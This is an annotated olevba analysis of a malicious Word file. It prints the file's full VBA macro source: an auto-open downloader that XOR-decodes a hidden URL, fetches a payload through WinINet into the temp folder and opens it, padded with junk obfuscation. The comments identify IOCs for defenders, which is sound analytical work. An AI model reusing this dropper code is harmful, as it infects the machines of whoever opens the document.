- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- APIPO1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: APIPO1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Auto-exec entry point: olevba's table for this module lists AutoOpen as
- ' "Runs when the Word document is opened". The body is one call into module
- ' OIDL8, so nothing in ThisDocument itself looks suspicious beyond the trigger.
- Sub autoopen()
- ALBACAL3
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO OIDL8.bas
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/OIDL8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' First hop of the call chain started by autoopen.
- ' CHEG (81) is handed to ITSALLABAMA, which never reads its parameter, so the
- ' variable is filler rather than configuration.
- Sub ALBACAL3()
- Dim CHEG As Integer
- CHEG = 81
- ITSALLABAMA (CHEG)
- End Sub
- ' String decoder used for every hidden value in this sample.
- '   IIIIIBRDA1 - XOR key (all call sites on this page pass WIIIN34DIS2).
- '   IIIIIBRDA2 - ciphertext as a hex string, two hex digits per output character.
- ' Returns the decoded text. Hex-decoding the constants alone does not reveal
- ' the plaintext, because each byte is XORed with a key character afterwards.
- Public Function KALLKKKASKAJJAS(IIIIIBRDA1 As String, IIIIIBRDA2 As String) As String
- Dim ZINGMAH30 As Long
- Dim ZINGMAH30O As String
- Dim ZINGMAH300 As Integer
- Dim ZINGMAH3001 As Integer
- ' One iteration per encoded byte: LEFUNCLE1 is Len(), so the bound is Len(hex) / 2.
- For ZINGMAH30 = 1 _
- To _
- ( _
- LEFUNCLE1 _
- (IIIIIBRDA2) _
- / 2)
- ' Parse the i-th pair of hex digits into a number via Val("&Hnn").
- ZINGMAH300 = Val("&H" & _
- (Mid$(IIIIIBRDA2, _
- (2 * ZINGMAH30) - 1, 2)))
- ' Key character at 1-based position (i Mod Len(key)) + 1, so the first byte
- ' is paired with the SECOND key character and the key then wraps around.
- ZINGMAH3001 = Asc(Mid$(IIIIIBRDA1, _
- ((ZINGMAH30 Mod Len(IIIIIBRDA1)) + 1), 1))
- ZINGMAH30O = ZINGMAH30O + Chr(ZINGMAH300 Xor ZINGMAH3001)
- Next ZINGMAH30
- KALLKKKASKAJJAS = ZINGMAH30O
- End Function
- ' Thin wrapper around Len(); only called from the decoder's loop bound, where
- ' it adds one level of indirection and nothing else.
- Public Function LEFUNCLE1(Papapa1 As String) As Integer
- LEFUNCLE1 = Len(Papapa1)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- +------------+---------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PIDLE0.bas
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/PIDLE0'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' WinINet imports under meaningless local names. The Alias clause carries the
- ' real API name, so triage should key on the Alias/Lib strings:
- '   SEEEGMATICKS122  -> InternetOpenA       (open a session)
- '   SEEEGMATICKS1    -> InternetOpenUrlA    (request a URL)
- '   SEEEGMATICKS21   -> InternetReadFile    (read response bytes)
- '   SEEEGMATICKS1222 -> InternetCloseHandle (release a handle)
- ' The two branches differ only in PtrSafe and LongPtr vs Long, i.e. the macro is
- ' written to run in both 64-bit and 32-bit Office.
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function SEEEGMATICKS1222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
- Public Declare PtrSafe Function SEEEGMATICKS122 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
- Public Declare PtrSafe Function SEEEGMATICKS21 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As LongPtr, ByVal SA33LOOOOMMA442 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare PtrSafe Function SEEEGMATICKS1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
- #Else
- Public Declare Function SEEEGMATICKS1222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
- Public Declare Function SEEEGMATICKS122 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
- Public Declare Function SEEEGMATICKS21 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As Long, ByVal SA33LOOOOMMA442 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare Function SEEEGMATICKS1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
- #End If
- ' Encoded configuration. WIIIN34DIS3..6 are hex ciphertext for KALLKKKASKAJJAS;
- ' WIIIN34DIS2 is the XOR key (first argument at every call site on this page).
- ' Roles, taken from where each constant is used:
- '   WIIIN34DIS6 - ProgID for the CreateObject whose .Open is called on the
- '                 dropped file (XOR-decodes to Shell.Application).
- '   WIIIN34DIS5 - suffix appended to the special-folder path: the drop file name.
- '   WIIIN34DIS4 - lpszUrl argument of InternetOpenUrlA: the download URL, the
- '                 main network IOC once decoded.
- '   WIIIN34DIS3 - ProgID for the object that supplies GetSpecialFolder,
- '                 FileExists and DeleteFile (XOR-decodes to
- '                 Scripting.FileSystemObject).
- Public Const WIIIN34DIS6 = "3701130605472B07141A0D0D0D1F1F0219"
- Public Const WIIIN34DIS5 = "38021D0B0D0D0B0753144A0B140E"
- Public Const WIIIN34DIS4 = "0C1D021A5346450F0D170A1D040A1418141B050711440A06075851424B595445131512"
- Public Const WIIIN34DIS3 = "370A0403191D031903582207000E2514040701043908030C0903"
- Public Const WIIIN34DIS2 = "sdivjiijwdvdnlkvmw"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO IDL4.bas
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/IDL4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Second hop of the call chain. IHMAPARAM1828 is never read, and the literal
- ' passed on is ignored by ITSALBATROS as well; the only effect is the call.
- ' Because nothing in this module matches a keyword, olevba reports it as clean.
- ' A per-module "No suspicious keyword" line says nothing about the document.
- Sub ITSALLABAMA(IHMAPARAM1828 As Long)
- ITSALBATROS ("OOOOOOOAOANNNNNN3112221")
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO FILE6.bas
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/FILE6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' THEPARAMK23 is not referenced by any module shown in this report.
- Public Const THEPARAMK23 = "KAKAJIDO"
- ' Third hop of the call chain: ignores PERKADO and calls Sub1, which does the
- ' actual work. The signature is split over line continuations; presumably this
- ' is meant to defeat line-based signature matching (not provable from the dump).
- Public _
- Function ITSALBATROS(PERKADO _
- As _
- String)
- Sub1
- End Function
- ' Orchestrates the download-and-open sequence:
- '   1. create a file-system helper object from a decoded ProgID,
- '   2. build the drop path = special folder 2 + decoded file name,
- '   3. delete any earlier copy at that path,
- '   4. download to that path via TDSHKAMPOT2122,
- '   5. create a second object from a decoded ProgID and call .Open on the path.
- ' Host artefacts to look for: a new file in the user's temp folder written by
- ' the Word process, followed by that file being opened. The function returns
- ' no value; it is a Function only in name.
- Public Function Sub1()
- Dim OOOOOOO8888888 As Object
- ' WIIIN34DIS3 XOR-decodes to Scripting.FileSystemObject, which matches the
- ' GetSpecialFolder / FileExists / DeleteFile calls made on this object.
- Set OOOOOOO8888888 = CreateObject _
- (KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS3))
- ' Junk block: the counter only takes the value 0, so "= 5" is never true and
- ' End never runs. The same filler pattern recurs four times in this function.
- Dim KLALAKKSKKNNCN0 As Integer
- For KLALAKKSKKNNCN0 = 0 To 0
- If KLALAKKSKKNNCN0 = 5 Then End
- Next KLALAKKSKKNNCN0
- Dim ETOPART98 As Object
- ' Sub2 returns GetSpecialFolder(2) from the helper object.
- Set ETOPART98 = Sub2(OOOOOOO8888888)
- Dim ZS67AASCCS As Integer
- For ZS67AASCCS = 0 To 0
- If ZS67AASCCS = 5 Then End
- Next ZS67AASCCS
- Dim HAZ82767
- ' ASDFKJF is never declared (this module has no Option Explicit); it receives
- ' the decoded drop file name.
- ASDFKJF = KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS5)
- ' Concatenating the folder object with a string relies on the object's default
- ' property (its path), giving the full drop path in HAZ82767.
- HAZ82767 = ETOPART98 & ASDFKJF
- Dim LOOO9371003942732 As Integer
- ' Junk: the counter runs 6..10 and therefore never equals 5.
- For LOOO9371003942732 = 6 To 10
- If LOOO9371003942732 = 5 Then End
- Next LOOO9371003942732
- 'Set OOOOOOO8888888 = CreateObject _
- '(KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS3))
- Dim NSMSBSDSAS7 As Integer
- For NSMSBSDSAS7 = 0 To 0
- If NSMSBSDSAS7 = 5 Then End
- Next NSMSBSDSAS7
- ' Remove a leftover copy so the download below writes a fresh file.
- If Sub3(OOOOOOO8888888, HAZ82767) Then
- OOOOOOO8888888. _
- DeleteFile HAZ82767
- End If
- ' Download to the drop path. The Boolean result is discarded (empty If body),
- ' so the .Open below is attempted even when the download failed.
- If TDSHKAMPOT2122(HAZ82767) Then
- End If
- ' No-op: SSSS is an undeclared variable that nothing else uses.
- Set SSSS = Nothing
- ' Existence check with an empty body; it has no effect on control flow.
- If Sub3(OOOOOOO8888888, HAZ82767) Then
- End If
- ' WIIIN34DIS6 XOR-decodes to Shell.Application; .Open asks the shell to open
- ' the dropped file, i.e. hands it to whatever handler its type maps to.
- Set SASASA = CreateObject _
- (KALLKKKASKAJJAS _
- (WIIIN34DIS2, WIIIN34DIS6))
- SASASA.Open HAZ82767
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO IDL3.bas
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/IDL3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Returns special folder number 2 of the object passed in. For a
- ' Scripting.FileSystemObject, 2 is TemporaryFolder, so the result is the
- ' user's temp directory as a Folder object.
- Public Function Sub2(ByRef Ob5 As Object) As Object
- Set Sub2 = Ob5.GetSpecialFolder(2)
- End Function
- ' Returns True when the path ascascas exists according to Ob6.FileExists and
- ' False otherwise. This is a plain wrapper; keeping it in a module of its own
- ' leaves the file operations out of the module that holds Sub1.
- Public Function Sub3(ByRef Ob6 As Object, ByVal ascascas As String) As Boolean
- If Ob6.FileExists(ascascas) Then
- Sub3 = True
- Else
- Sub3 = False
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO SIDL22.bas
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/SIDL22'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- ' Parameters for the WinINet calls in TDSHKAMPOT2122:
- '   IPPTDSH872 - read buffer size in characters, also the lNumBytesToRead value.
- '   IPPTDSH871 - sAgent for InternetOpenA, i.e. the HTTP User-Agent string. It
- '                is stored in clear text, so it can serve as a proxy/web-log
- '                indicator for this sample.
- '   IPPTDSH999 - lAccessType; 1 is INTERNET_OPEN_TYPE_DIRECT in WinINet.
- '   cCCc       - dwFlags for InternetOpenUrlA; &H4000000 is
- '                INTERNET_FLAG_NO_CACHE_WRITE, so the response should not be
- '                stored in the WinINet cache.
- Private Const IPPTDSH872 = 8162
- Private Const IPPTDSH871 As String = "MisterZALALU"
- Private Const IPPTDSH999 = 1
- Private Const cCCc = &H4000000
- ' Downloads the resource at the decoded URL and writes it to the path ITSTO.
- '   ITSTO   - destination file path (Sub1 passes the drop path).
- '   Returns - True when at least one character was accumulated and written;
- '             False (the default) when the session or URL could not be opened.
- ' The request is made from inside the Office process through wininet.dll, so
- ' network telemetry attributes it to Word rather than to a browser.
- Public Function TDSHKAMPOT2122 _
- (ByVal ITSTO As String) As Boolean
- ' Handle variables are sized to match the Declare branch in use.
- #If VBA7 _
- And Win64 Then
- Dim LPT1 As LongPtr, LPT2 As LongPtr
- #Else
- Dim LPT1 As Long, LPT2 As Long
- #End If
- Dim CDSFDFD As Long
- ' SA33LOOOOMMA442 is a fixed-length string used as the read buffer;
- ' CCEWGREHRHERHER33 accumulates the whole response.
- Dim SA33LOOOOMMA442 As String * IPPTDSH872, CCEWGREHRHERHER33 As String
- Dim EFEWFWEFWEFWEF As Integer, lddta As Double
- ' InternetOpenA: session handle, with IPPTDSH871 as the agent string.
- LPT1 = SEEEGMATICKS122(IPPTDSH871, IPPTDSH999, vbNullString, vbNullString, 0)
- If LPT1 = 0 Then
- Exit Function
- End If
- Dim ITSFROM As String
- ' The URL exists in plain text only here, at run time, after XOR decoding.
- ITSFROM = KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS4)
- ' InternetOpenUrlA: request handle for the decoded URL.
- LPT2 = SEEEGMATICKS1(LPT1, ITSFROM, vbNullString, 0, cCCc, 0)
- If LPT2 = 0 Then
- lddta = 0
- Else
- ' First InternetReadFile call. The whole fixed-length buffer is copied, not
- ' just the CDSFDFD characters that were read, so a short first read leaves
- ' buffer padding in the output; the file on disk may then differ in size and
- ' hash from the served payload.
- SEEEGMATICKS21 LPT2, SA33LOOOOMMA442, IPPTDSH872, CDSFDFD
- CCEWGREHRHERHER33 = SA33LOOOOMMA442
- ' Keep reading until a call reports zero bytes; later chunks are trimmed to
- ' the reported length before being appended.
- Do While CDSFDFD <> 0
- SEEEGMATICKS21 LPT2, SA33LOOOOMMA442, IPPTDSH872, CDSFDFD
- ' Junk block: the counter is only ever 0, so End is unreachable.
- Dim SSSDFDSFLLSLLS As Integer
- For SSSDFDSFLLSLLS = 0 To 0
- If SSSDFDSFLLSLLS = 5 Then End
- Next SSSDFDSFLLSLLS
- CCEWGREHRHERHER33 = CCEWGREHRHERHER33 + Mid(SA33LOOOOMMA442, 1, CDSFDFD)
- Loop
- ' Record the accumulated length (drives the return value) and take a free
- ' file number for the write.
- lddta = Len(CCEWGREHRHERHER33): EFEWFWEFWEFWEF = FreeFile
- ' Binary write of the accumulated data to ITSTO. olevba's Open / Binary /
- ' Write / Put keyword hits for this module all come from these statements.
- Open ITSTO _
- For Binary _
- Access Write _
- Lock Write _
- As #EFEWFWEFWEFWEF
- Put #EFEWFWEFWEFWEF, _
- , CCEWGREHRHERHER33
- ':
- ' Junk block, same unreachable-End pattern as above.
- Dim ssdcdcdsDDDDD As Integer
- For ssdcdcdsDDDDD = 0 To 0
- If ssdcdcdsDDDDD = 5 Then End
- Next ssdcdcdsDDDDD
- Close #EFEWFWEFWEFWEF
- End If
- ' InternetCloseHandle on both handles; the call for LPT2 is made even when
- ' LPT2 is 0 because it sits outside the If/Else.
- SEEEGMATICKS1222 LPT2
- SEEEGMATICKS1222 LPT1
- CCEWGREHRHERHER33 = ""
- ' A non-zero length is reported to the caller as success.
- If lddta Then
- TDSHKAMPOT2122 = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO UserForm1.frm
- in file: APIPO1.doc - OLE stream: u'Macros/VBA/UserForm1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)